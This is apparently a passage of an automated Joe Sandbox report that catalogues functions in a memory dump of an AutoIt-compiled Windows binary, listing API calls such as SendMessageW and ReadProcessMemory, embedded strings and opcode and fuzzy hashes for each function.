                                        • Instruction ID: de494c80c364094d5a64bd57a78fde145b4e4fdf5c4c10674d2beee90373c82a
                                        • Opcode Fuzzy Hash: 0542bdeadbedc7ca6382a3521bc054796111a75b298956a907f6a74a8bcbb0c4
                                        • Instruction Fuzzy Hash: 7C01FE71900214EFEB166F24EC86EEEBF7CDB14314F104126F9156B0D1DB705D55CA60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: 459ac18f8c7098d024780bf6ab66fd2ac4cc504ce91cbbbc0cc61ed9eee8a3c9
                                        • Instruction ID: b1f6415bcf866f8977e239dd7765bd1d9431f72fd75f0ba89650bc9b73fa66bb
                                        • Opcode Fuzzy Hash: 459ac18f8c7098d024780bf6ab66fd2ac4cc504ce91cbbbc0cc61ed9eee8a3c9
                                        • Instruction Fuzzy Hash: FD014535200204ABCB329FA4CC56FADB368FF88720F10C416F91A9B6D1D735E800C752
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: b9194e117a1858e48260c8ccd4c10b6e110f8b841eb3b91a0f923b39adc0a6ac
                                        • Instruction ID: ba7fd5cd837732f71e4d92c4bede4d9f40416578abcc72d856812a84bf780e22
                                        • Opcode Fuzzy Hash: b9194e117a1858e48260c8ccd4c10b6e110f8b841eb3b91a0f923b39adc0a6ac
                                        • Instruction Fuzzy Hash: 3501F9729002586EDF19D799CC56FFE7BF89B05311F00415AE193D6181E574A7088B60
                                        APIs
                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 0035CD75
                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 0035CDA8
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                        • String ID: @U=u
                                        • API String ID: 339422723-2594219639
                                        • Opcode ID: 9fc658233bbfe312f0b399d959bd2f0a95dc68991c547184248eb6e8773efa90
                                        • Instruction ID: bbd584878e11b825fc8d0225c1c2591f59174f8ad8b1b78e45def1ef77622fc3
                                        • Opcode Fuzzy Hash: 9fc658233bbfe312f0b399d959bd2f0a95dc68991c547184248eb6e8773efa90
                                        • Instruction Fuzzy Hash: ED012D71800128EFDB56AF54DC91EDA7BBCFB14344F50C0A5F94AAB151DE305E89CBA0
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035CCC6
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CCDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 336a1bdca20676d2c107fe716d99d81b1f243d0eeb4f2b2d6622e10bdaa6e873
                                        • Instruction ID: 0e3c12487f2d3a47b1f898b09abeb253233f6861d83f972c1baa7544d73565f2
                                        • Opcode Fuzzy Hash: 336a1bdca20676d2c107fe716d99d81b1f243d0eeb4f2b2d6622e10bdaa6e873
                                        • Instruction Fuzzy Hash: BEE022313A13227EF2321A118D4AFC72E0DCB89B16F121025FF0AAE0F5CED24C4782A0
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D463
                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D493
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3954ffb072e9391a558d0ac30298837edaacebe9715bd13432a72223165cdeb7
                                        • Instruction ID: 8dfcf6a99e77008e05b5771bb73a319d8f50a39f8329d90a9c57f54c030d4ce1
                                        • Opcode Fuzzy Hash: 3954ffb072e9391a558d0ac30298837edaacebe9715bd13432a72223165cdeb7
                                        • Instruction Fuzzy Hash: 54F0A0B1240304BBEA276E81EC46FE67B1DEB05BA6F104015FB051E1F0DAF26C009760
                                        APIs
                                          • Part of subcall function 0035D0D4: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D0ED
                                          • Part of subcall function 0035D0D4: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D127
                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 0035D5F2
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035D602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 6ca9608a7530a62a9b58867cde77e12bd7b49028cb827097e5bc1a63e4ff5e1f
                                        • Instruction ID: fb7896102cbc1725bdd55ffd7052adb617960ae4782f2b0791a9874b9f2546d8
                                        • Opcode Fuzzy Hash: 6ca9608a7530a62a9b58867cde77e12bd7b49028cb827097e5bc1a63e4ff5e1f
                                        • Instruction Fuzzy Hash: 86E0D8752083057FF6271A61AC4BE977B1CDB49716F114025FB00461B0EEA38C145524
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: 7ad82c35009b76571b23d31ddbb8f518b46239e03639fd78aa5ee5569b38e47c
                                        • Instruction ID: 7dda131a7fcb228df51b9404e41a105d19b430474258ba8d7c4b3e2a25ab49f3
                                        • Opcode Fuzzy Hash: 7ad82c35009b76571b23d31ddbb8f518b46239e03639fd78aa5ee5569b38e47c
                                        • Instruction Fuzzy Hash: 5AE0D83360022927D722EBA6AC4AED7FBACEB51764F000126F914E7181D6B0EA4587D0
                                        APIs
                                        • __umatherr.LIBCMT ref: 0034DA2A
                                          • Part of subcall function 0034DD86: __ctrlfp.LIBCMT ref: 0034DDE5
                                        • __ctrlfp.LIBCMT ref: 0034DA47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __ctrlfp$__umatherr
                                        • String ID: xn9
                                        • API String ID: 219961500-30944987
                                        • Opcode ID: 85d09d59ceaf79cccec7b47b43fcecb30600b4e5cbee1471dcf2a70782593f99
                                        • Instruction ID: c27a303e60ab6feb932046594151af27b0338c6f70bd1433fcfcc15d9dd510ba
                                        • Opcode Fuzzy Hash: 85d09d59ceaf79cccec7b47b43fcecb30600b4e5cbee1471dcf2a70782593f99
                                        • Instruction Fuzzy Hash: 7BE06D7140860AEADB027F80F9066AA7BE5EF05310F804495F99C1C1A6DFB294B49757
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0035B36B
                                          • Part of subcall function 00342011: _doexit.LIBCMT ref: 0034201B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: e1187d80f671c3d5ffa6ea0e07451fc50c0d65e3052ce1ed4a460bbb29a847ea
                                        • Instruction ID: ac7832d2a7df876b30d7dab685938a59313e96f9e1bca2180ca1cf2f8978fcb1
                                        • Opcode Fuzzy Hash: e1187d80f671c3d5ffa6ea0e07451fc50c0d65e3052ce1ed4a460bbb29a847ea
                                        • Instruction Fuzzy Hash: 16D05B3238431833D21B36987C47FD5B6CC8F05B51F150416FF487E5D28AE2A4D041D9
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0039BAB8
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0039BCAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DirectoryFreeLibrarySystem
                                        • String ID: WIN_XPe
                                        • API String ID: 510247158-3257408948
                                        • Opcode ID: 371e1d3534539561026c61822d03f221cb74da134f4f29b041e633fef7bec886
                                        • Instruction ID: 9748b11b4a218374fadb1fdcc9de074576978d9ce3a662cc54930d5de968a8cf
                                        • Opcode Fuzzy Hash: 371e1d3534539561026c61822d03f221cb74da134f4f29b041e633fef7bec886
                                        • Instruction Fuzzy Hash: 78E0A570C1415EAFCB56DBA8D985AEDB7BCBB08300F148486E022A6450C7755A45DF21
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038849F
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003884B2
                                          • Part of subcall function 00368355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: e76190776f1aebfa588a27c89cdb8eeb55decd7e986cd5601cb11c8b9db71930
                                        • Instruction ID: 03409377b0e4572ddf61d65c82f77c7d5ca38bfa661513ac4a7c690653ab93f7
                                        • Opcode Fuzzy Hash: e76190776f1aebfa588a27c89cdb8eeb55decd7e986cd5601cb11c8b9db71930
                                        • Instruction Fuzzy Hash: 01D01276384314B7E76BA770AC4FFD76A58EF19B11F140929B34AAA2D0C9E0B800C761
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003884DF
                                        • PostMessageW.USER32(00000000), ref: 003884E6
                                          • Part of subcall function 00368355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: caf1e23e1345904c8c457373fd3fb9690edab5a1266c57d944cd8849544686cb
                                        • Instruction ID: 97877f297864c4bde103a1907fd3c29170a2142d2e5377b64bcf64bb96fc345c
                                        • Opcode Fuzzy Hash: caf1e23e1345904c8c457373fd3fb9690edab5a1266c57d944cd8849544686cb
                                        • Instruction Fuzzy Hash: 2AD012763853147BE76BA770AC4FFD76658EB1AB11F140929B34AAA2D0C9E0B800C765
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0036D01E
                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0036D035
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: a1ad722ad264a83a4a2e3b620dcdfa460549dceea96e6c5ef2c4da8c0e81bc58
                                        • Instruction ID: 0dace1b91cb6e1ddaa22757283eb37d54b89923c677c5d62dd1bdc517a30c21c
                                        • Opcode Fuzzy Hash: a1ad722ad264a83a4a2e3b620dcdfa460549dceea96e6c5ef2c4da8c0e81bc58
                                        • Instruction Fuzzy Hash: E2D05EB154030EBBDB11ABA0ED0EF99776CA700705F104191B615D14D1D3B0D645CBA1
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0035CB4B
                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0035CB59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: c77cb753e6c1e05099545962fa770cf5c3b58af8a8ed432256851876a17a5610
                                        • Instruction ID: e63532e7e3fece57c1df3ce50f45328127d9777668bfa9da55892d0fcd774c44
                                        • Opcode Fuzzy Hash: c77cb753e6c1e05099545962fa770cf5c3b58af8a8ed432256851876a17a5610
                                        • Instruction Fuzzy Hash: D2C04C711405C0BAE7361F67BC0DD473E3DE7CBF51B51425CF216964B686790055D634